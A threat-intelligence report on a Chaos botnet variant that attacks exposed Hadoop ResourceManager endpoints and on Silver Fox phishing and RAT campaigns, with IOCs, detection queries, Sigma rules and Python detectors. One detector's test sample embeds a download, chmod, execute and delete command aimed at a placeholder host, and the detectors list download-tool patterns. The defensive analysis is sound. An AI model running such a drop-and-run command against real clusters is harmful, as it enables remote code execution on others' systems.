Chaos Botnet & Silver Fox: Two China-Nexus Campaigns Converging on Shared Infrastructure

Executive Summary
Between March and April 2026, Darktrace published findings on a new Chaos botnet variant actively targeting misconfigured cloud deployments — specifically Apache Hadoop clusters — rather than its traditional focus on routers and edge devices. The updated variant introduces SOCKS5 proxy functionality, enabling attackers to route malicious traffic through compromised servers and obscure the true origin of subsequent attacks.
Concurrently, the Silver Fox threat group (also tracked as UTG-Q-1000, Void Arachne) — previously concentrated on China and Taiwan — has expanded operations into Japan, Malaysia, and wider Southeast Asia using Winos 4.0 (ValleyRAT) and HoldingHands RAT (Gh0stBins). Tax-themed phishing remains the primary initial access vector.
A critical infrastructure overlap: the domain used to deliver the Chaos payload (pan.tenire[.]com) was previously attributed to Silver Fox's Operation Silk Lure phishing campaign (October 2025, documented by Seqrite Labs). Darktrace stops short of hard attribution, but this reuse is a meaningful signal indicating shared infrastructure within the Chinese cybercriminal ecosystem.
Organizations should act immediately if they operate Hadoop, Spark, or any big data framework with administrative endpoints exposed to the internet, particularly the ResourceManager on port 8088/tcp.
1. Background & Campaign Intersection
Chaos Botnet — Evolution History
First documented by Lumen Black Lotus Labs in September 2022, Chaos is a Go-based cross-platform malware supporting Windows, Linux, FreeBSD across ARM, Intel x86/x86-64, MIPS, and PowerPC architectures. It is assessed to be an evolution of Kaiji, a DDoS malware that previously targeted misconfigured Docker instances.
In its 2022 form, Chaos could execute up to 70 commands from a C2 server: remote shell, SSH brute-forcing for lateral movement, CVE exploitation, cryptocurrency mining, and DDoS over HTTP, TLS, TCP, UDP, and WebSocket.
Silver Fox — Threat Actor Profile
Silver Fox (SwimSnake, UTG-Q-1000, Void Arachne) is a Chinese-speaking threat group active since at least early 2024, operating a dual-track model combining espionage objectives with financially motivated campaigns. The group invests heavily in culturally-localized lures — impersonating tax authorities and finance ministries in each target country.
Silver Fox's toolkit revolves around Gh0st RAT derivatives: ValleyRAT/Winos 4.0 (primary modular backdoor), HoldingHands RAT/Gh0stBins (deployed alongside the primary payload), and more recently AtlasCross RAT (observed from March 2026). The group also leverages SEO poisoning to distribute malware via fake download sites impersonating Google Chrome, Telegram, WPS Office, and DeepSeek.
The Convergence Point: Infrastructure Overlap
The domain pan.tenire[.]com — used to host the Chaos agent in the March 2026 campaign — previously appeared in Silver Fox's Operation Silk Lure (Seqrite Labs, October 2025), distributing ValleyRAT via phishing. Darktrace does not assert hard attribution, and we maintain the same cautious stance. However, infrastructure reuse of this nature is operationally significant for defenders: tracking infrastructure is typically more reliable for attribution than tracking malware families, which can be completely rewritten.
2. Event Timeline
| Date | Event |
|---|---|
| September 2022 | Lumen Black Lotus Labs documents Chaos botnet — Go-based, cross-platform |
| March 2024 | Silver Fox begins using Excel lures targeting China to distribute Winos 4.0 |
| August 2025 | Fortinet documents Silver Fox SEO poisoning campaign distributing HiddenGh0st and Winos |
| October 2025 | Operation Silk Lure — Silver Fox phishing distributing ValleyRAT; pan.tenire[.]com first observed |
| October 2025 | Fortinet FortiGuard Labs publishes report on Silver Fox expansion to Japan/Malaysia via HoldingHands RAT |
| March 2026 | Darktrace CloudyPots honeypot captures new Chaos variant targeting Hadoop; pan.tenire[.]com reused |
| March 2026 | Silver Fox deploys AtlasCross RAT, extends targeting to Philippines, Thailand, Indonesia, Singapore, India |
| April 2026 | Darktrace and The Hacker News publish Chaos variant analysis |
3. Technical Analysis: Chaos Botnet 2026 Variant
3.1 Initial Access — Hadoop ResourceManager Exploitation
The attack observed by Darktrace begins with an HTTP POST request to the Apache Hadoop ResourceManager endpoint. The ResourceManager exposes port 8088/tcp and accepts new application submissions via REST API — a legitimate operational interface that becomes unauthenticated RCE when exposed to the internet without access controls.
Attack Vector: HTTP POST → Hadoop ResourceManager (port 8088)
Payload Type: Application creation embedding shell commands
The attacker creates a new "application" embedding a shell command sequence that:
- Downloads the Chaos agent binary from pan.tenire[.]com
- Runs chmod 777 on the binary, granting execute permission to all users
- Executes the binary
- Deletes the binary from disk to minimize the forensic trail
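The four-step launch command above is what a defender can key on. The following is an added example (not Darktrace's code and not part of the original report) that inspects the JSON body of a submission to the ResourceManager REST API and scores the embedded launch command for the download, chmod, execute, delete chain. It assumes the body follows the YARN submission schema, where the command sits under am-container-spec.commands.command; the sample bodies are constructed and use a placeholder host.

```python
import json
import re
from typing import Dict, List

# Stages of the "download, chmod, execute, delete" sequence described in the text.
STAGE_PATTERNS: Dict[str, "re.Pattern"] = {
    "download": re.compile(r"\b(curl|wget|tftp|ftpget)\b"),
    "chmod":    re.compile(r"\bchmod\s+(\+x|[ugoa]+\+[rwx]*x\w*|[0-7]{3,4})\b"),
    "delete":   re.compile(r"\brm\s+(-[a-zA-Z]+\s+)*\S"),
}

# Constructed samples (placeholder host, not a real indicator).
SAMPLE_BENIGN = json.dumps({
    "application-id": "application_0000000000000_0001",
    "application-name": "nightly-etl",
    "am-container-spec": {"commands": {"command": "/usr/bin/java -jar /opt/etl/etl.jar"}},
    "application-type": "YARN",
})
SAMPLE_MALICIOUS = json.dumps({
    "application-id": "application_0000000000000_0002",
    "application-name": "x",
    "am-container-spec": {"commands": {
        "command": "curl -s http://<PAYLOAD-HOST>/x -o /tmp/x; chmod 777 /tmp/x; /tmp/x; rm -f /tmp/x"}},
    "application-type": "YARN",
})

def extract_launch_command(body: str) -> str:
    """Return the AM launch command from a YARN submission body, or '' if absent or not JSON."""
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return ""
    if not isinstance(doc, dict):
        return ""
    cmd = doc.get("am-container-spec", {}).get("commands", {}).get("command", "")
    return cmd if isinstance(cmd, str) else ""

def find_stages(command: str) -> List[str]:
    """Name the stages of the drop-and-run chain that appear in a shell command string."""
    stages = [name for name, pat in STAGE_PATTERNS.items() if pat.search(command)]
    # "execute": the path given to chmod is later invoked as its own command.
    m = re.search(r"\bchmod\s+(?:-\w+\s+)*\S+\s+(\S+)", command)
    if m and re.search(r"(^|[;&|]\s*)" + re.escape(m.group(1)) + r"(\s|$)", command):
        stages.append("execute")
    return stages

def classify_submission(body: str) -> str:
    """Verdict for one POST body: no-command, benign, suspicious or critical."""
    cmd = extract_launch_command(body)
    if not cmd:
        return "no-command"
    stages = set(find_stages(cmd))
    if {"download", "chmod", "execute"} <= stages:
        return "critical"      # full drop-and-run chain; deletion is a bonus signal
    if "download" in stages and "chmod" in stages:
        return "suspicious"
    return "benign"

if __name__ == "__main__":
    for label, body in (("benign", SAMPLE_BENIGN), ("malicious", SAMPLE_MALICIOUS)):
        print(label, "->", classify_submission(body), find_stages(extract_launch_command(body)))
```

Feed it request bodies captured by a reverse proxy or WAF in front of port 8088; anything scoring critical from a source outside your orchestration systems warrants immediate containment.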
3.2 Binary Analysis — Changes from Prior Versions
The captured sample is a 64-bit ELF binary compiled for x86-64 Linux — a departure from earlier Chaos variants targeting ARM/MIPS/PowerPC on consumer routers. The internal namespace was restructured and multiple functions were rewritten or removed.
Removed capabilities:
- SSH brute-forcing spreader (lateral movement via SSH key cracking)
- Router CVE exploitation routines (inherited from Kaiji)
Retained capabilities:
- Persistence via systemd
- Keep-alive script stored on disk
- DDoS over HTTP, TLS, TCP, UDP, WebSocket
New capability: SOCKS5 Proxy
Trigger: C2 issues "StartProxy" command
Action: Malware opens listener on attacker-specified TCP port
Mode: SOCKS5 proxy — routes attacker traffic through victim host
Impact: Attacker's subsequent activity appears to originate from victim's IP
Replacing the SSH spreader and router exploits with a SOCKS5 proxy represents a deliberate monetization strategy shift. SSH brute-forcing generates high noise and accelerates blocklisting. A silent SOCKS5 proxy, by contrast, is a premium underground service: residential IP proxies (from real machines, not datacenter IPs) command higher prices precisely because they evade geo-blocking and IP-based blocklists far more effectively.
3.3 C2 & Infrastructure
Payload Delivery Domain: pan.tenire[.]com
Cross-reference: Operation Silk Lure (Silver Fox, Oct 2025) — ValleyRAT distribution
4. Technical Analysis: Silver Fox — Winos 4.0 & HoldingHands RAT
4.1 Phishing Entry — Ministry of Finance Lures
Infection begins with phishing emails containing PDFs impersonating official documents from the target country's Ministry of Finance. PDFs embed multiple malicious URLs, the majority pointing to Tencent Cloud storage. Fortinet confirmed that Tencent Cloud APPID values allowed analysts to link multiple phishing files back to the same operator.
One PDF posing as a Taiwanese tax regulation draft redirected victims to a Japanese-language page (twsww[.]xin/download[.]html) — where users were prompted to download a ZIP archive containing a HoldingHands RAT payload. This cross-lingual redirect is an indicator of deliberate multi-target infrastructure design.
4.2 Infection Chain — Malaysia Campaign
Stage 1: Executable posing as "excise audit document"
└─ Sideloads malicious DLL
Stage 2: Malicious DLL (dokan2.dll — impersonating Dokany file system driver)
└─ Shellcode loader for sw.dat
Stage 3: sw.dat executes:
├─ Anti-VM checks
├─ Process enumeration — checks for Avast, Norton, Kaspersky
├─ Terminate security processes if detected
├─ Privilege escalation (TrustedInstaller impersonation)
└─ Terminate Task Scheduler
Stage 4: Drops components into C:\Windows\System32\
├─ svchost.ini → contains RVA of VirtualAlloc function (evasion technique)
├─ TimeBrokerClient.dll
├─ msvchost.dat
└─ system.dat
Stage 5: HoldingHands RAT decrypted and injected into memory
└─ Establishes C2, sends host info, heartbeat every 60 seconds
4.3 HoldingHands RAT Capabilities
HoldingHands RAT (Gh0stBins) is a variant of Gh0st RAT — source code leaked in 2008 and widely adopted across Chinese hacking groups. Capabilities include:
- Arbitrary command execution
- File download and execution
- Exfiltration: screenshots, clipboard data, system metadata
- Dynamic C2 address updates via Windows Registry
- Persistence via Task Scheduler
- Security process termination and evasion
4.4 SEO Poisoning Vector
Parallel to phishing, Silver Fox operates a network of fake software download pages to distribute Winos 4.0. Impersonated software includes:
Google Chrome | Telegram | Youdao | Sogou AI | WPS Office | DeepSeek
This vector is particularly dangerous in enterprise environments where employees may install software directly without IT channel controls.
4.5 Campaign Linking — Infrastructure Correlation
Fortinet confirmed cross-campaign connections via:
Shared C2 IP: 156.251.17[.]9 (Taiwan and Japan campaigns)
PDB artifact: BackDoor.pdb
Domain reuse: twczb[.]com → resolves to same IP as Taiwan campaign → used in Malaysia
Tencent Cloud: Shared APPID links phishing files across geographic campaigns
5. IOCs & Artifacts
Chaos Botnet
# C2 / Payload Delivery
Domain: pan.tenire[.]com
# Binary characteristics
Type: 64-bit ELF (x86-64 Linux)
Feature: SOCKS5 proxy (StartProxy C2 command)
Persist: systemd service + on-disk keep-alive script
Silver Fox / HoldingHands RAT
# Network Indicators
IP: 156.251.17[.]9 [Shared C2 - Taiwan/Japan campaigns]
Domain: twsww[.]xin [HoldingHands delivery - Japanese lure]
Domain: twczb[.]com [Malaysia/Taiwan linking infrastructure]
Domain: bifa668[.]com [AtlasCross RAT C2, port 9899/tcp]
# Host-based Indicators
File: dokan2.dll [Shellcode loader - impersonates Dokany]
File: sw.dat [Second-stage payload]
File: svchost.ini [Contains RVA of VirtualAlloc - evasion]
File: TimeBrokerClient.dll [Dropped component]
File: msvchost.dat [Dropped component]
File: system.dat [Dropped component]
Path: C:\Windows\System32\ [Drop location for above files]
Debug: BackDoor.pdb [PDB path artifact in binary]
Registry: Dynamic C2 update [HoldingHands - C2 address stored in registry]
# Malware Families
ValleyRAT / Winos 4.0 → primary modular backdoor (Gh0st RAT lineage)
HoldingHands RAT → aka Gh0stBins, Gh0st RAT variant
AtlasCross RAT → newest addition (March 2026)
Note: Specific file hashes were not publicly released at time of writing. Monitor Fortinet FortiGuard Labs and Darktrace publications for updates.
6. MITRE ATT&CK Mapping
Chaos Botnet (2026 Variant)
| Tactic | Technique | ID | Description |
|---|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 | Hadoop ResourceManager RCE exploitation |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 | Shell commands embedded in Hadoop application |
| Defense Evasion | Indicator Removal: File Deletion | T1070.004 | Binary deleted from disk post-execution |
| Persistence | Create or Modify System Process: Systemd Service | T1543.002 | Systemd-based persistence |
| Command and Control | Proxy: Multi-hop Proxy | T1090.003 | SOCKS5 proxy to mask attacker origin |
| Impact | Network Denial of Service | T1498 | DDoS capability (HTTP/TLS/TCP/UDP/WebSocket) |
| Impact | Resource Hijacking | T1496 | Cryptocurrency mining |
Silver Fox / HoldingHands RAT
| Tactic | Technique | ID | Description |
|---|---|---|---|
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 | PDF lures impersonating Ministry of Finance |
| Initial Access | Drive-by Compromise | T1189 | SEO poisoning → fake software download sites |
| Execution | Shared Modules | T1129 | DLL sideloading (dokan2.dll) |
| Defense Evasion | Virtualization/Sandbox Evasion | T1497 | Anti-VM checks in sw.dat |
| Defense Evasion | Hijack Execution Flow: DLL Side-Loading | T1574.002 | Malicious DLL loaded by legitimate process |
| Defense Evasion | Masquerading | T1036 | Files impersonating svchost, TimeBrokerClient |
| Privilege Escalation | Abuse Elevation Control Mechanism | T1548 | TrustedInstaller impersonation |
| Discovery | Security Software Discovery | T1518.001 | Checks for Avast, Norton, Kaspersky processes |
| Discovery | Process Discovery | T1057 | Active process enumeration |
| Defense Evasion | Impair Defenses: Disable or Modify Tools | T1562.001 | Security process termination |
| Persistence | Scheduled Task/Job: Scheduled Task | T1053.005 | Task Scheduler abuse for persistence |
| Command and Control | Application Layer Protocol | T1071 | C2 over TCP, 60-second heartbeat |
| C2 | Dynamic Resolution | T1568 | C2 address updated via Windows Registry |
| Collection | Screen Capture | T1113 | Screenshot exfiltration |
| Collection | Clipboard Data | T1115 | Clipboard data exfiltration |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | Data exfiltrated over established C2 |
7. Expert Assessment
7.1 Chaos Botnet: A Strategic Monetization Pivot
The removal of the SSH spreader and router CVE exploits — two defining Chaos capabilities — in favor of a SOCKS5 proxy is not a technical regression. It's a calculated business decision.
SSH brute-forcing generates high network noise and results in rapid blocklisting. Router CVE exploitation requires constant maintenance of an exploit list. A SOCKS5 proxy, by contrast, is operationally "silent" — pass-through traffic rarely triggers alerts in environments without deep network monitoring. In underground markets, residential proxy services (IPs sourced from real machines rather than datacenters) command premium pricing because they evade geo-blocking and IP reputation filters far more effectively than datacenter IPs.
The 2026 variant also signals a broader botnet strategy shift from "edge device compromise" to "cloud workload compromise." This is unsurprising: cloud adoption continues to accelerate, but security posture often fails to keep pace, especially for big data frameworks like Hadoop and Spark — designed for trusted internal networks but frequently exposed to the internet without authentication.
In our experience analyzing enterprise cloud environments, Hadoop administrative ports (8088, 9870, 16010) are commonly found exposed without firewall controls, particularly on clusters provisioned quickly for data analytics projects that bypassed formal security review.
7.2 Silver Fox: The Dual-Track Threat Model
Silver Fox exemplifies the increasingly blurred boundary between APT-style espionage and financially motivated cybercrime within the Chinese threat ecosystem. The infrastructure overlap with the Chaos campaign — while not definitively confirmed as intentional — hints at a shared "Criminal Service Provider" model where infrastructure is pooled across multiple operations.
The group's investment in culturally-localized lures is notable: a PDF impersonating Taiwanese tax regulations that redirects to a Japanese-language page reflects careful regional targeting. Given the confirmed expansion into Malaysia and wider Southeast Asia (Philippines, Thailand, Indonesia, Singapore, India), organizations in the region should anticipate Silver Fox deploying lures in local languages — Vietnamese, Bahasa Indonesia, Thai — following the same tax and financial authority impersonation pattern.
7.3 Infrastructure Overlap — Our Assessment
The pan.tenire[.]com overlap between Chaos (2026) and Silver Fox's Operation Silk Lure (2025) can be explained by: (1) the same threat actor operating both campaigns, (2) shared infrastructure purchased from a common Criminal Service Provider, or (3) coincidence (low probability given operational context). We align with Darktrace's appropriately cautious attribution stance. That said, infrastructure reuse tracking remains one of the most effective attribution techniques available to defenders — malware code can be fully rewritten, but domains and IPs are frequently reused for economic reasons.
8. Recommendations
Immediate (0–24h)
Cloud workload hardening:
# Check if Hadoop ResourceManager is internet-exposed
# From an external network, attempt:
curl http://<HADOOP_RESOURCEMANAGER_IP>:8088/ws/v1/cluster/info
# If response received → URGENT: apply firewall rules immediately
# Ports to block from internet: 8088, 9870, 8042, 16010, 19888
# Check for anomalous processes on Linux cloud hosts
ps aux | grep -E "[c]haos|[k]aiji|[m]iner|[x]mrig"   # bracket trick keeps grep from matching itself
systemctl list-units --type=service
# Find recently created systemd services
find /etc/systemd/system/ -newer /etc/passwd -name "*.service"
SIEM Detection (Microsoft Sentinel KQL):
// Detect potential Chaos SOCKS proxy behavior
// Unusual outbound TCP connections from Linux hosts
let internal_cloud_host_range = dynamic(["<CLOUD_HOST_IP_1>", "<CLOUD_HOST_IP_2>"]); // placeholder: replace with the actual host IPs
CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationPort !in (80, 443, 22, 53)
| where SourceIP in (internal_cloud_host_range)
| summarize ConnectionCount = count(), DestPorts = make_set(DestinationPort)
    by SourceIP, DestinationIP, bin(TimeGenerated, 1h)
| where ConnectionCount > 100
| order by ConnectionCount desc
// Detect Hadoop ResourceManager POST exploitation
AzureDiagnostics
| where TimeGenerated > ago(24h)
| where Category == "ApplicationGatewayAccessLog"
| where requestUri_s contains "/ws/v1/cluster/apps"
and httpMethod_s == "POST"
| project TimeGenerated, clientIP_s, requestUri_s, httpStatus_d
Endpoint Detection (Silver Fox / HoldingHands):
// Detect sideloading and drop artifacts (file events, not process events)
// dokan2.dll is sideloaded next to the lure executable, so it is matched on any path;
// confirm against hosts with a legitimate Dokany installation before alerting.
DeviceFileEvents
| where Timestamp > ago(7d)
| where FileName in~ ("dokan2.dll", "TimeBrokerClient.dll", "msvchost.dat", "system.dat", "svchost.ini")
| where FileName =~ "dokan2.dll" or FolderPath startswith @"C:\Windows\System32\"
| project Timestamp, DeviceName, ActionType, InitiatingProcessFileName, FileName, FolderPath
// Detect TrustedInstaller impersonation
DeviceProcessEvents
| where TimeGenerated > ago(7d)
| where ProcessTokenElevation == "TokenElevationTypeFull"
and InitiatingProcessAccountName !in~ ("SYSTEM", "TrustedInstaller")
and FileName in~ ("svchost.exe", "services.exe")
| project TimeGenerated, DeviceName, AccountName, FileName, InitiatingProcessFileName
Short-term (1–7 Days)
Network segmentation:
- Audit all Hadoop/Spark/HDFS administrative service ports. Every administrative endpoint (ResourceManager, NameNode UI, History Server) must sit behind a VPN or be restricted to internal network access — never directly internet-exposed.
- Review cloud provider security group rules (AWS Security Groups, Azure NSG, GCP Firewall Rules) — prioritize rules with a 0.0.0.0/0 source on non-80/443 ports.
Threat hunting:
- Query DNS logs for IOC domains: pan.tenire[.]com, twsww[.]xin, twczb[.]com.
- Search for svchost.ini, msvchost.dat, system.dat in C:\Windows\System32\ — these filenames do not exist in a clean Windows installation.
- Review Task Scheduler entries created by processes other than SYSTEM or legitimate admin accounts.
User awareness:
- Brief staff on tax-themed PDF phishing lures, particularly if the organization has employees or business relationships in Japan, Malaysia, or Taiwan.
Long-term
Cloud security posture:
- Deploy a Cloud Security Posture Management (CSPM) solution to automatically detect misconfigurations — especially unnecessarily exposed services.
- For Hadoop clusters: enable Kerberos authentication and wire encryption. Hadoop Secure Mode is not optional for any production cluster with internet adjacency.
Detection engineering:
- Build detection coverage for "binary drop + execute + delete" patterns on Linux hosts — a common anti-forensics pattern that is frequently under-covered in SIEM deployments.
- Develop behavioral analytics for SOCKS proxy abuse: Linux hosts with anomalous outbound TCP connection counts, particularly when correlated with newly created systemd services.
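The SOCKS5 listener from section 3.2 and the "execute, then delete from disk" step leave two host-level traces: an unexpected listening socket, and a running process whose executable no longer exists. The following is an added example (not Darktrace's or any vendor's code) that audits `ss -ltnp` output against a process allowlist and resolves each listener's /proc/<pid>/exe link, which Linux suffixes with " (deleted)" when the binary has been removed. The allowlist, the high-port threshold, the sample ss output and the fake exe map are assumptions constructed for the example.

```python
import os
import re
import subprocess
from dataclasses import dataclass
from typing import Callable, List

# One data line of `ss -ltnp`, e.g.
# LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))
SS_LINE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+\s+'
    r'users:\(\("(?P<name>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)'
)
# Processes expected to own listeners on this host (assumption; tune per environment).
ALLOWLIST = {"sshd", "nginx", "java", "systemd"}
HIGH_PORT = 10000   # mirrors the Sigma rule's "high port" band
TEMP_PATHS = ("/tmp/", "/dev/shm/", "/var/tmp/")

@dataclass
class Finding:
    pid: int
    name: str
    port: int
    exe: str
    reasons: List[str]

def proc_exe(pid: int) -> str:
    """Resolve /proc/<pid>/exe; a binary deleted after launch resolves to '<path> (deleted)'."""
    try:
        return os.readlink(f"/proc/{pid}/exe")
    except OSError:
        return "?"

def audit_listeners(ss_output: str, exe_resolver: Callable[[int], str] = proc_exe) -> List[Finding]:
    """Flag listeners that are unexpected, backed by a deleted binary, or run from a temp path."""
    findings: List[Finding] = []
    for line in ss_output.splitlines():
        m = SS_LINE.match(line.strip())
        if not m:
            continue                      # header or non-LISTEN line
        port = int(m.group("local").rsplit(":", 1)[1])   # handles 0.0.0.0:p, [::]:p, *:p
        pid, name = int(m.group("pid")), m.group("name")
        exe = exe_resolver(pid)
        reasons = []
        if port >= HIGH_PORT and name not in ALLOWLIST:
            reasons.append("unexpected high-port listener")
        if exe.endswith("(deleted)"):
            reasons.append("executable deleted from disk")
        if exe.startswith(TEMP_PATHS):
            reasons.append("executable in world-writable temp path")
        if reasons:
            findings.append(Finding(pid, name, port, exe, reasons))
    return findings

# Constructed sample output and a fake /proc resolver for offline use.
SAMPLE_SS = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      4096   [::]:8088           [::]:*            users:(("java",pid=2210,fd=311))
LISTEN 0      4096   0.0.0.0:31337       0.0.0.0:*         users:(("x",pid=4411,fd=7))
"""
FAKE_EXE = {812: "/usr/sbin/sshd", 2210: "/usr/lib/jvm/java-11/bin/java", 4411: "/tmp/x (deleted)"}

if __name__ == "__main__":
    live = subprocess.run(["ss", "-ltnp"], capture_output=True, text=True, check=False).stdout
    for f in audit_listeners(live or SAMPLE_SS):
        print(f"pid={f.pid} {f.name} port={f.port} exe={f.exe}: {', '.join(f.reasons)}")
```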
Threat intelligence:
- Subscribe to feeds from Darktrace, Fortinet FortiGuard Labs, and Sekoia.io for updated IOCs on Silver Fox and Chaos botnet activity.
- Monitor MISP or equivalent OSINT TI platforms to track pan.tenire[.]com and associated infrastructure.
9. Sigma Detection Rules
title: Chaos Botnet - Hadoop ResourceManager RCE Exploitation
id: [NEEDS VERIFICATION: Generate UUID]
status: experimental
description: Detects HTTP POST to Hadoop ResourceManager /ws/v1/cluster/apps
  endpoints indicating potential Chaos botnet exploitation of misconfigured Hadoop
references:
  - https://www.darktrace.com/blog/darktrace-identifies-new-chaos-malware-variant-exploiting-misconfigurations-in-the-cloud
logsource:
  category: webserver
detection:
  selection:
    cs-method: POST
    # prefix covers both the application-ID request (/ws/v1/cluster/apps/new-application)
    # and the submission itself (/ws/v1/cluster/apps); a duplicated key here is not valid YAML
    cs-uri-stem|contains: '/ws/v1/cluster/apps'
  condition: selection
falsepositives:
  - Legitimate Hadoop job submission from authorized orchestration systems
level: high
tags:
  - attack.initial_access
  - attack.t1190
---
title: HoldingHands RAT - Suspicious File Artifacts in System32
id: [NEEDS VERIFICATION: Generate UUID]
status: experimental
description: Detects presence of files associated with HoldingHands RAT infection
  chain. These filenames do not exist in a clean Windows installation.
logsource:
  product: windows
  category: file_event
detection:
  selection:
    TargetFilename|contains:
      - 'C:\Windows\System32\svchost.ini'
      - 'C:\Windows\System32\msvchost.dat'
      - 'C:\Windows\System32\system.dat'
      - 'C:\Windows\System32\TimeBrokerClient.dll'
  condition: selection
falsepositives:
  - None expected
level: critical
tags:
  - attack.defense_evasion
  - attack.t1036
---
title: Potential SOCKS5 Proxy Listener - Botnet Activity
id: [NEEDS VERIFICATION: Generate UUID]
status: experimental
description: Detects processes opening unexpected TCP listeners on high ports,
  potentially indicating SOCKS proxy functionality from Chaos-like malware
logsource:
  product: linux
  category: network_connection
detection:
  selection:
    Initiated: 'false'
    DestinationPort|gte: 10000
    DestinationPort|lte: 65535
  filter_known:
    Image|contains:
      - '/usr/bin/python'
      - '/usr/sbin/nginx'
      - '/usr/sbin/apache2'
  condition: selection and not filter_known
falsepositives:
  - Legitimate high-port services; adjust filter_known per environment
level: medium
tags:
  - attack.command_and_control
  - attack.t1090.003
10. References
Darktrace — "Darktrace Identifies New Chaos Malware Variant Exploiting Misconfigurations in the Cloud" (April 2026)
https://www.darktrace.com/blog/darktrace-identifies-new-chaos-malware-variant-exploiting-misconfigurations-in-the-cloud
The Hacker News — "New Chaos Variant Targets Misconfigured Cloud Deployments, Adds SOCKS Proxy" (April 8, 2026)
https://thehackernews.com/2026/04/new-chaos-variant-targets-misconfigured.html
The Hacker News — "Researchers Warn of New Go-based Malware Targeting Windows and Linux Systems" (September 2022)
https://thehackernews.com/2022/09/researchers-warn-of-new-go-based.html
Fortinet FortiGuard Labs — "Silver Fox Expands Winos 4.0 Attacks to Japan and Malaysia via HoldingHands RAT" (October 2025)
https://thehackernews.com/2025/10/silver-fox-expands-winos-40-attacks-to.html
Sekoia.io — "Silver Fox: The Only Tax Audit Where the Fine Print Installs Malware" (March/April 2026)
https://blog.sekoia.io/silver-fox-the-only-tax-audit-where-the-fine-print-installs-malware/
The Hacker News — "Silver Fox Expands Asia Cyber Campaign with AtlasCross RAT and Fake Domains" (March 2026)
https://thehackernews.com/2026/03/silver-fox-expands-asia-cyber-campaign.html
Help Net Security — "Chaos malware expands from routers to Linux cloud servers" (April 2026)
https://www.helpnetsecurity.com/2026/04/08/chaos-malware-cloud-misconfigured-servers/